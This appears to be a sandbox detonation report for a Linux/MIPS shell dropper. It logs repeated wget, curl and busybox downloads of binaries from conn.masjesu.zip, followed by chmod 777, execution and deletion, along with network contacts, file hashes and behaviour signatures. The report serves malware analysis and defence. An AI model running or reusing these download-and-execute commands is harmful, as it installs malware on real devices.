[chmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD

[./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/rm

[rm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/chmod

[chmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m

[./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/rm

[rm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/chmod

[chmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1

[./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/rm

[rm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/chmod

[chmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA

[./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/rm

[rm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/chmod

[chmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To

[./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/rm

[rm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/chmod

[chmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675

[./aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/rm

[rm aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/chmod

[chmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt

[./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/rm

[rm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/chmod

[chmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT

[./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/rm

[rm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/chmod

[chmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW

[./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/rm

[rm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/chmod

[chmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr

[./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/rm

[rm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/chmod

[chmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0

[./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/rm

[rm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:00

Reported

2024-11-24 01:03

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

127s

Command Line

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 N/A
N/A /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA N/A
N/A /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD N/A
N/A /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m N/A
N/A /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt N/A
N/A /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT N/A
N/A /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To N/A
N/A /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 N/A
N/A /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 N/A
N/A /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW N/A
N/A /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr N/A
N/A /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK N/A
N/A /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H N/A
N/A /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs N/A
N/A /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H N/A
N/A /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs N/A
N/A /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK N/A
N/A /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD N/A
N/A /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m N/A
N/A /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 N/A
N/A /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA N/A
N/A /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To N/A
N/A /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 N/A
N/A /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /usr/bin/curl N/A
File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /usr/bin/curl N/A
File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /usr/bin/curl N/A
File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /usr/bin/curl N/A
File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /usr/bin/curl N/A
File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /usr/bin/curl N/A
File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /usr/bin/curl N/A
File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /usr/bin/curl N/A
File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /usr/bin/curl N/A
File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /usr/bin/curl N/A
File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /usr/bin/curl N/A
File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /usr/bin/curl N/A
File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /usr/bin/curl N/A
File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /usr/bin/curl N/A
File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /usr/bin/curl N/A
File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /usr/bin/curl N/A
File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /usr/bin/curl N/A
File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /usr/bin/curl N/A
File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /usr/bin/curl N/A
File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /usr/bin/curl N/A
File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /usr/bin/curl N/A
File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /usr/bin/curl N/A
File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /usr/bin/curl N/A
File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /usr/bin/curl N/A

Processes

/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/chmod

[chmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1

[./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/rm

[rm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/chmod

[chmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

